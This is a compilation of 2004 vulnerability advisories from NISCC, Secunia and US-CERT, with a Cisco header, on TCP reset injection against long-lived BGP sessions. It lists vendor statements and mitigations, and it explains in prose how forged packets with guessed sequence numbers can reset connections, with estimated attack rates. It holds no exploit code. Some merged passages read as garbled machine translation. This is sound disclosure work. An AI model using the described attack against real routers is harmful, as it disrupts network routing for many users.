href="http://www.cymru.com/Documents/secure-bgp-template.html">http://www.cymru.com/Documents/secure-bgp-template.html </a></td> </tr> <tr> <td width="3%">\x95 </td> <td width="11%">Juniper </td> <td width="99%"> <a href="http://www.qorbit.net/documents/junos-bgp-template.pdf">http://www.qorbit.net/documents/junos-bgp-template.pdf </a> </td> </tr> </table> <p> Guidance on tuning of the IP stack for a number of different UNIX operating systems is available at <a href="http://www.cymru.com/Documents/ip-stack-tuning.html">http://www.cymru.com/Documents/ip-stack-tuning.html </a> <br> <br> <br> <B>Vendor Information</B> <br> <br> The following vendors have provided information about how their products are affected by these vulnerabilities.<br> <br> <i><font size="2">Please note that <a href="http://www.jpcert.or.jp">JPCERT/CC</a> have released a Japanese language advisory for this vulnerability which contains additional information regarding Japanese vendors. This advisory is available at <a href="http://www.jpcert.or.jp/at/2004/at040003.txt">http://www.jpcert.or.jp/at/2004/at040003.txt</a>.</font></i><br> <br> </p> </p> </p> <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1"> <tr> <td width="33%"><font size="2"><a href="#certicom">Certicom</a></font></td> <td width="33%"><font size="2"><a href="#iij">Internet Initiative Japan, Inc</a></font></td> <td width="34%"><font size="2"><a href="#nec">NEC</a></font></td> </tr> <tr> <td width="33%"><font size="2"><a href="#checkpoint">Check Point</a></font></td> <td width="33%"><font size="2"><a href="#interniche">InterNiche</a></font></td> <td width="34%"><font size="2"><a href="#nortel">Nortel</a></font></td> </tr> <tr> <td width="33%"><font size="2"><a href="#cisco">Cisco</a></font></td> <td width="33%"><font size="2"><a href="#juniper">Juniper Networks</a></font></td> <td width="34%"><font size="2"><a href="#polycom">Polycom</a></font></td> </tr> <tr> <td width="33%"><font size="2"><a href="#cray">Cray Inc</a></font></td> <td width="33%"><font size="2"><a href="#lucent">Lucent Technologies</a></font></td> <td width="34%"><font size="2"><a href="#seccomp">Secure Computing Corporation</a></font></td> </tr> <tr> <td width="33%"><font size="2"><a href="#hitachi">Hitachi</a></font></td> <td width="33%"><font size="2"><a href="#mitel">Mitel Networks</a></font></td> <td width="34%"><font size="2"><a href="#yamaha">Yamaha</a></font></td> </tr> <tr> <td width="33%"><font size="2"><a href="#innovaphone">Innovaphone</a></font></td> <td width="33%"><font size="2"><a href="#mrlg">MRLG</a></font></td> <td width="34%">&nbsp;</td> </tr> </table> </p> <br> <table border="0" width="100%" cellpadding="8" cellspacing="0"> <tr> <td width="100%" colspan="2" bgcolor="#FFFFbe"> <u><a name="certicom"></a>Certicom</u></td> </tr> <tr> <td width="3%" bgcolor="#FFFFbe"> &nbsp;</td> <td width="97%" bgcolor="#FFFFbe"> Certicom has examined the National Infrastructure Security Coordination Centre (NISCC) advisory and determined it is not vulnerable.<br> <br>Certicom Developer Toolkits for SSL (SSL Plus, SSL Plus for Java, Security Builder SSL-C and Security Builder SSL-J) do not provide a TCP/IP transport mechanism, but rather utilize the supported operating system's TCP/IP stack. The vulnerability is against the TCP/IP stack itself, and not directly against the functionality offered by Certicom toolkits. Therefore, there is no patch or workaround that can be implemented within Certicom products. The patch or workaround must be provided by the operating system vendor.<br> <br> Customers are urged to contact their operating system vendors to determine if they have provided a workaround to this advisory. If you have any further questions please do not hesitate to contact <a href="mailto:support@certicom.com">support@certicom.com</a>.</td> </tr> <tr> <td width="100%" colspan="2" bgcolor="#FFFFaf"><u><a name="checkpoint"></a> Check Point</u></td> </tr> <tr> <td width="3%" bgcolor="#FFFFaf">&nbsp;</td> <td width="97%" bgcolor="#FFFFaf">The latest release for VPN-1/FireWall-1 (R55 HFA-03) contains a protection against this vulnerability.&nbsp; The protection applies to both the firewall device and to hosts behind the firewall.<br> <br> Please refer to the Check Point web site for further information at:<br> <a HREF="http://www.checkpoint.com/techsupport/alerts/tcp_dos.html"> http://www.checkpoint.com/techsupport/alerts/tcp_dos.html</a>.</td> </tr> <tr> <td width="100%" colspan="2" bgcolor="#FFFFbe"> <u><a name="cisco"></a>Cisco</u></td> </tr> <tr> <td width="3%" bgcolor="#FFFFbe"> &nbsp;</td> <td width="97%" bgcolor="#FFFFbe"> Cisco Systems is addressing the vulnerabilities identified by NISCC Vulnerability Advisory 236929 across its entire product line.&nbsp; Cisco has released two related advisories:<br> <br> TCP Vulnerabilities in Multiple IOS-Based Cisco Products<br> <a href="http://www.cisco.com/warp/public/707/cisco-sa-20040420-tcp-ios.shtml">http://www.cisco.com/warp/public/707/cisco-sa-20040420-tcp-ios.shtml</a><br> <br> TCP Vulnerabilities in Multiple Non-IOS Cisco Products<br> <a href="http://www.cisco.com/warp/public/707/cisco-sa-20040420-tcp-nonios.shtml">http://www.cisco.com/warp/public/707/cisco-sa-20040420-tcp-nonios.shtml</a></td> </tr> <tr> <td width="100%" colspan="2" bgcolor="#FFFFaf"> <u><a name="cray"></a>Cray Inc</u></td> </tr> <tr> <td width="3%" bgcolor="#FFFFaf">&nbsp;</td> <td width="97%" bgcolor="#FFFFaf">Cray Inc. is vulnerable on their UNICOS, UNICOS/mk and UNICOS/mp systems.&nbsp; Spr's have been opened to track this issue.&nbsp; Please contact your local Cray Service Representative for more information.</td> </tr> <tr> <td width="100%" colspan="2" bgcolor="#FFFFbe"> <u><a name="hitachi"></a>Hitachi</u></td> </tr> <tr> <td width="3%" bgcolor="#FFFFbe"> &nbsp;</td> <td width="97%" bgcolor="#FFFFbe"> Hitachi is investigating the potential impact to Hitachi's products.</td> </tr> <tr> <td width="100%" colspan="2" bgcolor="#FFFFaf"> <u><a name="innovaphone"></a>Innovaphone</u></td> </tr> <tr> <td width="3%" bgcolor="#FFFFaf">&nbsp;</td> <td width="97%" bgcolor="#FFFFaf"> Not vulnerable.</td> </tr> <tr> <td width="100%" colspan="2" bgcolor="#FFFFbe"> <u><a name="iij"></a>Internet Initiative Japan, Inc (IIJ)</u></td> </tr> <tr> <td width="3%" bgcolor="#FFFFbe"> &nbsp;</td> <td width="97%" bgcolor="#FFFFbe"> IIJ will release a new firmware to fix this vulnerability.&nbsp; Details are available on their web site at <a href="http://www.seil.jp/en/ann/announce_en_20040421_01.txt"> http://www.seil.jp/en/ann/announce_en_20040421_01.txt</a>.</td> </tr> <tr> <td width="100%" colspan="2" bgcolor="#FFFFaf"> <u><a name="interniche"></a>InterNiche</u></td> </tr> <tr> <td width="3%" bgcolor="#FFFFaf">&nbsp;</td> <td width="97%" bgcolor="#FFFFaf">=== NicheStack v2.0 TCP/IP ===<br> <br> InterNiche Technologies has updated its NicheStack v2.0 TCP/IP product to handle the scenarios described in NISCC Vulnerability Notice #236929.&nbsp; The patch is available to all InterNiche customers in accordance with the terms of their current support agreements.<br> <br> More information can be found on <a href="http://www.iNiche.com">www.iNiche.com</a> or through <a href="mailto:support@iNiche.com">support@iNiche.com</a> <br><br><br> === NicheLite v2.0 TCP/IP ===<br> <br> InterNiche Technologies has updated its NicheLite v2.0 TCP/IP product to handle the scenarios described in NISCC Vulnerability Notice #236929.&nbsp; The patch is available to all InterNiche customers in accordance with the terms of their current support agreements. <br> <br> More information can be found on <a href="http://www.iNiche.com">www.iNiche.com</a> or through <a href="mailto:support@iNiche.com">support@iNiche.com</a> </td> </tr> <tr> <td width="100%" colspan="2" bgcolor="#FFFFbe"> <u><a name="juniper"></a> Juniper Networks</u></td> </tr> <tr> <td width="3%" bgcolor="#FFFFbe"> &nbsp;</td> <td width="97%" bgcolor="#FFFFbe"> Juniper Networks products are susceptible to this vulnerability. Software is available that implements several mechanisms to mitigate the associated risks. Customers should contact Juniper Networks Technical Assistance Center for availability and download instructions.<br> <br>Additional information is posted on our web site at <a href="https://www.juniper.net/support">https://www.juniper.net/support</a>. </td> </tr> <tr> <td width="100%" colspan="2" bgcolor="#FFFFaf"> <u><a name="lucent"></a>Lucent Technologies</u></td> </tr> <tr> <td width="3%" bgcolor="#FFFFaf">&nbsp;</td> <td width="97%" bgcolor="#FFFFaf">Lucent Technologies is aware of this vulnerability advisory and is investigating any potential impact to its product portfolio. As further information becomes available, Lucent will provide information directly to its customers, if appropriate.</td> </tr> <tr> <td width="100%" colspan="2" bgcolor="#FFFFbe"> <u><a name="mitel"></a>Mitel Networks</u></td> </tr> <tr> <td width="3%" bgcolor="#FFFFbe"> &nbsp;</td> <td width="97%" bgcolor="#FFFFbe"> Mitel is aware of the vulnerability and is working with the vendors of our underlying networking software to assess the impact and, if necessary, determine potential solutions. When more information becomes available, an advisory will be issued. Please contact '<a href="mailto:security@mitel.com">security@mitel.com</a>' if you have specific questions.</td> </tr> <tr> <td width="100%" colspan="2" bgcolor="#FFFFaf"> <u><a name="mrlg"></a>MRLG</u></td> </tr> <tr> <td width="3%" bgcolor="#FFFFaf">&nbsp;</td> <td width="97%" bgcolor="#FFFFaf">A new version of the Multi-Router Looking Glass tool (4.3.0) has been released.&nbsp; This includes a patch that prevents a remote user from utilising the &quot;sh ip bgp neighbors&quot; functionality.&nbsp; This new version is available from <a href="ftp://ftp.enterzone.net/looking-glass/CURRENT/"> ftp://ftp.enterzone.net/looking-glass/CURRENT/</a>. </td> </tr> <tr> <td width="100%" colspan="2" bgcolor="#FFFFbe"> <u><a name="nec"></a>NEC</u></td> </tr> <tr> <td width="3%" bgcolor="#FFFFbe"> &nbsp;</td> <td width="97%" bgcolor="#FFFFbe"> NEC is aware of this vulnerability and is trying to determine potential impacts on our products.</td> </tr> <tr> <td width="100%" colspan="2" bgcolor="#FFFFaf"> <u><a name="nortel"></a>Nortel Networks</u></td> </tr> <tr> <td width="3%" bgcolor="#FFFFaf">&nbsp;</td> <td width="97%" bgcolor="#FFFFaf">Nortel Networks has evaluated this issue and testing has confirmed that it is possible to successfully exploit this vulnerability. However, the preconditions for a successful exploitation require levels of access to the network that are unlikely to be achieved in a normal network operating environment; furthermore, such levels of access would enable other forms of attack with much greater impact than that achievable by exploiting this vulnerability.<br> <br> Nortel Networks is continuing to validate that this vulnerability has no serious consequences for Nortel equipment, and will update this statement periodically.</td> </tr> <tr> <td width="100%" colspan="2" bgcolor="#FFFFbe"> <u><a name="polycom"></a>Polycom</u></td> </tr> <tr> <td width="3%" bgcolor="#FFFFbe"> &nbsp;</td> <td width="97%" bgcolor="#FFFFbe"> Polycom has investigated the potential impact to our products for NISCC Advisory 236929.<br> <br> Specific product information will be provided at <a HREF="http://www.polycom.com/securitycenter"> http://www.polycom.com/securitycenter</a>.</td> </tr> <tr> <td width="100%" colspan="2" bgcolor="#FFFFaf"> <u><a name="seccomp"></a>Secure Computing Corporation</u></td> </tr> <tr> <td width="3%" bgcolor="#FFFFaf">&nbsp;</td> <td width="97%" bgcolor="#FFFFaf">The Sidewinder and Sidewinder G2 firewalls offer protection against this attack at all releases. As application-layer firewalls, Sidewinder and Sidewinder G2 offer protection to systems behind the firewall as well as protecting management connections to the firewall.</td> </tr> <tr> <td width="100%" colspan="2" bgcolor="#FFFFbe"> <u><a name="yamaha"></a>Yamaha</u></td> </tr> <tr> <td width="3%" bgcolor="#FFFFbe"> &nbsp;</td> <td width="97%" bgcolor="#FFFFbe"> Pending.</td> </tr> </table> <br> <br> <b>Acknowledgements</b><br> <br> NISCC wishes to thank the following:<br> <br> <table border="0" cellpadding="6" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber3"> <tr> <td width="3%" align="left" valign="top">\x95 </td> <td width="197%">Steve Bellovin, Rob Thomas and Paul Watson for their contributions to this advisory.</td> </tr> <tr> <td width="3%" align="left" valign="top">\x95 </td> <td width="197%">Cisco Systems Inc. and Juniper Networks Inc. for their help with the content of this advisory and for their support during the disclosure process.</td> </tr> <tr> <td width="3%" align="left" valign="top">\x95 </td> <td width="197%">JPCERT/CC for their assistance in co-ordinating this disclosure in Japan.</td> </tr> </table> <br> <br> <b>References</b> <br> <table border="0" cellpadding="4" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber7"> <tr> <td width="2%">&nbsp;</td> <td width="98%" colspan="3"><b>Internet Engineering Task Force</b></td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="96%" colspan="2">RFC 793 Transmission Control Protocol</td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="94%"><a href="http://www.ietf.org/rfc/rfc793.txt"> http://www.ietf.org/rfc/rfc793.txt</a></td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="96%" colspan="2">RFC 1323 TCP Extensions for High Performance</td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="96%"><a href="http://www.ietf.org/rfc/rfc1323.txt"> http://www.ietf.org/rfc/rfc1323.txt</a></td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="96%" colspan="2">RFC 1771 A Border Gateway Protocol 4 (BGP-4)</td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="94%"><a href="http://www.ietf.org/rfc/rfc1771.txt"> http://www.ietf.org/rfc/rfc1771.txt</a></td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="96%" colspan="2">RFC 2385 Protection of BGP Sessions via the TCP MD5 Signature Option</td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="94%"><a href="http://www.ietf.org/rfc/rfc2385.txt"> http://www.ietf.org/rfc/rfc2385.txt</a></td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="96%" colspan="2">RFC 2827 Network Ingress Filtering</td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="94%"><a href="http://www.ietf.org/rfc/rfc2827.txt"> http://www.ietf.org/rfc/rfc2827.txt</a></td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="96%" colspan="2">RFC 3562 Considerations for the TCP MD5 Signature Option</td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="94%"><a href="http://www.ietf.org/rfc/rfc3562.txt"> http://www.ietf.org/rfc/rfc3562.txt</a></td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="96%" colspan="2">RFC 3682 Generalized TTL Security Mechanism</td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="94%"><a href="http://www.ietf.org/rfc/rfc3682.txt"> http://www.ietf.org/rfc/rfc3682.txt</a></td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="96%" colspan="2">Internet Draft - Transmission Control Protocol security considerations</td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="94%"> <a href="http://www.ietf.org/internet-drafts/draft-ietf-tcpm-tcpsecure-00.txt"> http://www.ietf.org/internet-drafts/draft-ietf-tcpm-tcpsecure-00.txt</a></td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="98%" colspan="3"><b>NISCC</b></td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="96%" colspan="2">Best Practice Guidelines - Border Gateway Protocol</td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="94%"> <a href="http://www.niscc.gov.uk/BGP%20Filtering%20Guide.pdf"> http://www.niscc.gov.uk/BGP Filtering Guide.pdf</a></td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="98%" colspan="3"><b>Configuration and Tuning Guides</b></td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="96%" colspan="2">Secure BGP Template for Cisco IOS</td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="94%"> <a href="http://www.cymru.com/Documents/secure-bgp-template.html"> http://www.cymru.com/Documents/secure-bgp-template.html</a></td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="96%" colspan="2">JUNOS Secure BGP Template</td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="94%"> <a href="http://www.qorbit.net/documents/junos-bgp-template.pdf"> http://www.qorbit.net/documents/junos-bgp-template.pdf</a></td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="96%" colspan="2">UNIX IP Stack Tuning Guide</td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="94%"> <a href="http://www.cymru.com/Documents/ip-stack-tuning.html"> http://www.cymru.com/Documents/ip-stack-tuning.html</a></td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="98%" colspan="3"><b>Other Documents</b></td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="96%" colspan="2">SANS discussion on egress filtering</td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="94%"><a href="http://www.sans.org/y2k/egress.htm"> http://www.sans.org/y2k/egress.htm</a></td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="98%" colspan="3"><b>Vulnerability Databases</b></td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="96%" colspan="2">Common Vulnerabilities and Exposures (CVE)</td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="94%"> <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0230"> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0230</a></td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="96%" colspan="2">Open Source Vulnerability Database (OSVDB)</td> </tr> <tr> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="2%">&nbsp;</td> <td width="94%"> <a href="http://www.osvdb.org/displayvuln.php?osvdb_id=4030"> http://www.osvdb.org/displayvuln.php?osvdb_id=4030</a></td> </tr> </table> <p> <br> <br> <b>Contact Information</b><br> <br> The NISCC Vulnerability Management Team can be contacted as follows:<br> </p> </p> <table border="1" width="87%" cellspacing="3" cellpadding="5"> <tr> <td width="30%" valign="top">Email</td> <td width="70%"><a href="mailto:vulteam@niscc.gov.uk">vulteam@niscc.gov.uk</a> <br><i>(Please quote the advisory reference in the subject line.)</i></td> </tr> <tr> <td width="30%" valign="top">Telephone</td> <td width="70%"> +44 (0)20 7821 1330 Extension 4511 <br><i>(Monday to Friday 08:30 - 17:00)</i></td> </tr> <tr> <td width="30%" valign="top">Fax</td> <td width="70%"> +44 (0)20 7821 1686</td> </tr> <tr> <td width="30%" valign="top">Post</td> <td width="70%"> Vulnerability Management Team<br> NISCC<br> PO Box 832<br> London<br> SW1P 1BG</td> </tr> </table> <br> We encourage those who wish to communicate via email to make use of our PGP key. This is available from <a href="http://www.uniras.gov.uk/UNIRAS.asc">http://www.uniras.gov.uk/UNIRAS.asc</a>.<br> <br> Please note that UK government protectively marked material should not be sent to the email address above.<br> <br> If you wish to be added to our email distribution list, please email your request to <a href="mailto:uniras@niscc.gov.uk">uniras@niscc.gov.uk</a>.<br> <br> <br> <b> What is NISCC?</b><br> <br> For further information regarding the UK National Infrastructure Security Co-Ordination Centre, please visit the NISCC web site at: <br> <a href="http://www.niscc.gov.uk/aboutniscc/index.htm">http://www.niscc.gov.uk/aboutniscc/index.htm</a><br> <br> Reference to any specific commercial product, process or service by trade name, trademark manufacturer or otherwise, does not constitute or imply its endorsement, recommendation, or favouring by NISCC. The views and opinions of authors expressed within this notice shall not be used for advertising or product endorsement purposes.<br> <br> Neither shall NISCC accept responsibility for any errors or omissions contained within this advisory. In particular, they shall not be liable for any loss or damage whatsoever, arising from or in connection with the usage of information contained within this notice.<br> <br> \xa9 2004 Crown Copyright<br> <br> Revision History<br> <br> <table border="0" width="100%"> <tr> <td width="23%"> <font size="2">April 20</font><SMALL>, 2004: </SMALL> </td> <td width="77%"> <SMALL> Initial release (1.0)</SMALL></td> </tr> <tr> <td width="23%"> <font size="2">April 21, 2004:</font></td> <td width="77%"> <font size="2">Corrected hyperlinks (1.1)</font></td> </tr> <tr> <td width="23%"> &nbsp;</td> <td width="77%"> <font size="2">Inserted impact statement for Cisco (1.1)</font></td> </tr> <tr> <td width="23%"> &nbsp;</td> <td width="77%"> <font size="2">Inserted impact statement for Mitel (1.1)</font></td> </tr> <tr> <td width="23%"> &nbsp;</td> <td width="77%"> <font size="2">Inserted MRLG patch reference (1.2)</font></td> </tr> <tr> <td width="23%"> <font size="2">April 22, 2004:</font></td> <td width="77%"> <font size="2">Revised impact statement for Certicom (1.3)</font></td> </tr> <tr> <td width="23%"> &nbsp;</td> <td width="77%"> <font size="2">Inserted impact statement for Nortel Networks (1.3)</font></td> </tr> <tr> <td width="23%"> &nbsp;</td> <td width="77%"> <font size="2">Inserted impact statement for Secure Computing Corporation (1.3)</font></td> </tr> <tr> <td width="23%"> &nbsp;</td> <td width="77%"> <font size="2">Inserted references section (1.4)</font></td> </tr> <tr> <td width="23%"> &nbsp;</td> <td width="77%"> <font size="2">Inserted impact statement for Lucent Technologies (1.4)</font></td> </tr> </table> <br> &lt;End of NISCC Vulnerability Advisory><br> </div> </body> </html>

TCP, when using a large Window Size, makes it easier for remote attackers to guess sequence numbers and cause a denial of service (connection loss) to persistent TCP connections by repeatedly injecting a TCP RST packet, especially in protocols that use long-lived connections, such as BGP. A vulnerability exists in the reliance of the Border Gateway Protocol (BGP) on the Transmission Control Protocol (TCP) to maintain persistent sessions. Sustained exploitation of this vulnerability could lead to a denial-of-service condition affecting a large segment of the Internet community. Normal operations would most likely resume shortly after the attack stopped. TCP Has a sequence number TCP There is a problem that it is justified if it is within the window. Therefore, there is a vulnerability that makes it easy to guess the external sequence number when establishing a long-term connection that increases the window size. Note that products affected by this vulnerability TCP Covers many products with implementation. For more information, NISCC-236929 (JVN) , NISCC Advisory 236929 (CPNI Advisory 00391) Please check also.A third party TCP By predicting the sequence number of a particular TCP Service operation interruption such as forcibly terminating a connection (DoS) There is a possibility of being attacked. A vulnerability in TCP implementations may permit unauthorized remote users to reset TCP sessions. This issue affects products released by multiple vendors. Exploiting this issue may permit remote attackers to more easily approximate TCP sequence numbers. This will permit a remote attacker to inject a SYN or RST packet into the session, causing it to be reset and effectively allowing denial-of-service attacks. An attacker would exploit this issue by sending a packet to a receiving implementation with an approximated sequence number and a forged source IP and TCP port. Few factors may present viable target implementations, such as imlementations that: - depend on long-lived TCP connections - have known or easily guessed IP address endpoints - have known or easily guessed TCP source ports. As a result, this issue is likely to affect a number of routing platforms. Note also that while a number of vendors have confirmed this issue in various products, investigations are ongoing and it is likely that many other vendors and products will turn out to be vulnerable as the issue is investigated further. Other consequences may also result from this issue, such as injecting specific data in TCP sessions, but this has not been confirmed. **Update: Microsoft platforms are also reported prone to this vulnerability. Vendor reports indicate that an attacker will require knowledge of the IP address and port numbers of the source and destination of an existent legitimate TCP connection in order to exploit this vulnerability on Microsoft platforms. The following products and versions are affected: Oracle Solaris 10, 11; Openpgp 2.6.2; Mcafee Network Data Loss Prevention 8.6 and earlier, 9.2.0, 9.2.1, 9.2.2; Netbsd 1.5, Version 1.5.1, Version 1.5.2, Version 1.5.3, Version 1.6, Version 1.6.1, Version 1.6.2, Version 2.0; Xinuos Openserver Version 5.0.6, Version 5.0.7; Juniper Networks Junos OS; Xinuos Unixware Version 7.1.1, Version 7.1.3. ---------------------------------------------------------------------- Want a new IT Security job? Vacant positions at Secunia: http://secunia.com/secunia_vacancies/ ---------------------------------------------------------------------- TITLE: Avaya Intuity Audix TCP Connection Reset Vulnerability SECUNIA ADVISORY ID: SA15263 VERIFY ADVISORY: http://secunia.com/advisories/15263/ CRITICAL: Less critical IMPACT: DoS WHERE: >From remote OPERATING SYSTEM: Avaya Intuity Audix R5 http://secunia.com/product/4586/ DESCRIPTION: Avaya has acknowledged a vulnerability in Intuity Audix, which can be exploited by malicious people to reset established TCP connections on a vulnerable system. For more information: SA11440 SOLUTION: A patch will reportedly be included in the next major release. ORIGINAL ADVISORY: Avaya: http://support.avaya.com/elmodocs2/security/ASA-2005-097_SCASA-2005-14.pdf OTHER REFERENCES: SA11440: http://secunia.com/advisories/11440/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. Routing operations would recover quickly after such attacks ended. I. Description In 2001, the CERT Coordination Center released CA-2001-09, describing statistical weaknesses in various TCP/IP Initial Sequence generators. In that document (<http://www.cert.org/advisories/CA-2001-09.html>), it was noted by Tim Newsham: [I]f a sequence number within the receive window is known, an attacker can inject data into the session stream or terminate the connection. If the ISN value is known and the number of bytes sent already sent is known, an attacker can send a simple packet to inject data or kill the session. Paul Watson has performed the statistical analysis of this attack when the ISN is not known and has pointed out that such an attack could be viable when specifically taking into account the TCP Window size. He has also created a proof-of-concept tool demonstrating the practicality of the attack. The National Infrastructure Security Co-Ordination Centre (NISCC) has published an advisory summarizing Paul Watson's analysis in "NISCC Vulnerability Advisory 236929," available at <http://www.uniras.gov.uk/vuls/2004/236929/index.htm>. Since TCP is an insecure protocol, it is possible to inject transport-layer packets into sessions between hosts given the right preconditions. For detailed information about BGP and some tips for securing it, please see Cisco System's documentation (<http://www.cisco.com/univercd/cc/td/doc/cisintwk/ito_doc/bgp.htm> or Team Cymru (<http://www.cymru.com/>). This may result in a brief loss of service until the fresh routing tables are created. When this is taken into account, instead of attempting to send a spoofed packet with all potential sequence numbers, the attacker would only need to calculate an valid sequence number that falls within the next expected ISN plus or minus half the window size. According to Paul Watson's report, with a typical xDSL data connection (80 Kbps, upstream) capable of sending of 250 packets per second (pps) to a session with a TCP Window size of 65,535 bytes, it would be possible to inject a TCP packet approximately every 5 minutes. It would take approximately 15 seconds with a T-1 (1.544 Mbps) connection. These numbers are significant when large numbers of compromised machines (often called "botnets" or "zombies") can be used to generate large amounts of packets that can be directed at a particular host. To protect against such injections, RFC 2385 provides a method of using MD5 signatures on the TCP Headers. If this form of verification is supported and enabled between two peers, then an attacker would have to obtain the key used to transmit the packet in order to successfully inject a packet into the TCP session. Another alternative would be to tunnel BGP over IPSec. Again, this would provide a form of authentication between the BGP peers and the data that they transmit. The lack of authentication when using TCP for BGP makes this type of attack more viable. US-CERT is tracking this issue as VU#415294. This reference number corresponds to CVE candidate CAN-2004-0230. NISCC is tracking this issue as Advisory 236929. II. Impacts could range from data corruption or session hijacking to a denial-of-service condition. III. Solution Apply a patch from your vendor Please see you vendor's statement regarding the availability of patches, updates and mitigation strategies. The lack of cryptographically-strong security options for the TCP header itself is a deficiency that technologies like IPSec try to address. It must be noted that in the final analysis that if an attacker has the ability to see unencrypted TCP traffic generated from a site, that site is vulnerable to various TCP attacks - not just those mentioned here. A stronger measure that would aid in protecting against such TCP attacks is end-to-end cryptographic solutions like those outlined in various IPSec documents. The key idea with an end-to-end cryptographic solution is that there is some secure verification that a given packet belongs in a particular stream. However, the communications layer at which this cryptography is implemented will determine its effectiveness in repelling ISN based attacks. Solutions that operate above the Transport Layer (OSI Layer 4), such as SSL/TLS and SSH1/SSH2, only prevent arbitrary packets from being inserted into a session. They are unable to prevent a connection reset (denial of service) since the connection handling will be done by a lower level protocol (i.e., TCP). On the other hand, Network Layer (OSI Layer 3) cryptographic solutions such as IPSec prevent both arbitrary packets entering a transport-layer stream and connection resets because connection management is directly integrated into the secure Network Layer security model. The solutions presented above have the desirable attribute of not requiring any changes to the TCP protocol or implementations to be made. RFC2385 ("Protection of BGP Sessions via the TCP MD5 Signature Option") and other technologies provide options for adding cryptographic protection within the TCP header at the cost of some potential denial of service, interoperability, and performance issues. Ingress filtering Ingress filtering manages the flow of traffic as it enters a network under your administrative control. You can configure your BGP routers to only accept packets on a specific network connection. Servers are typically the only machines that need to accept inbound connections from the public Internet. In the network usage policy of many sites, there are few reasons for external hosts to initiate inbound connections to machines that provide no public services. Thus, ingress filtering should be performed at the border to prohibit externally initiated inbound connections to non-authorized services. In this fashion, the effectiveness of many intruder scanning techniques can be dramatically reduced. Network Isolation Complex networks can benefit by separating data channels and control channels, such as BGP, into different logical or physical networks. Technologies such as VLANs, VPNs, leased links, NAT may all be able to contribute to separating the tranmission of control information from the transmission of the data stream. Egress filtering Egress filtering manages the flow of traffic as it leaves a network under your administrative control. There is typically limited need for machines providing public services to initiate outbound connections to the Internet. In the case of BGP, only your BGP routers should be establishing connections to your peers. Other BGP traffic generated on your network could be a sign of an attempted attack. Appendix A. As vendors report new information to US-CERT, we will update the vulnerability note. If a particular vendor is not listed in either the NISCC advisory, or the vulnerability, we recommend that you contact them for their comments. _________________________________________________________________ US-CERT thanks Paul Watson, Cisco Systems and NISCC for notifying us about this problem and for helping us to construct this advisory. _________________________________________________________________ Feedback can be directed to the US-CERT Technical Staff. _________________________________________________________________ Copyright 2004 Carnegie Mellon University. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Cisco Security Advisory:\xa0TCP Vulnerabilities in Multiple IOS-Based Cisco Products Revision 1.0 For Public Release 2004 April 20 21:00 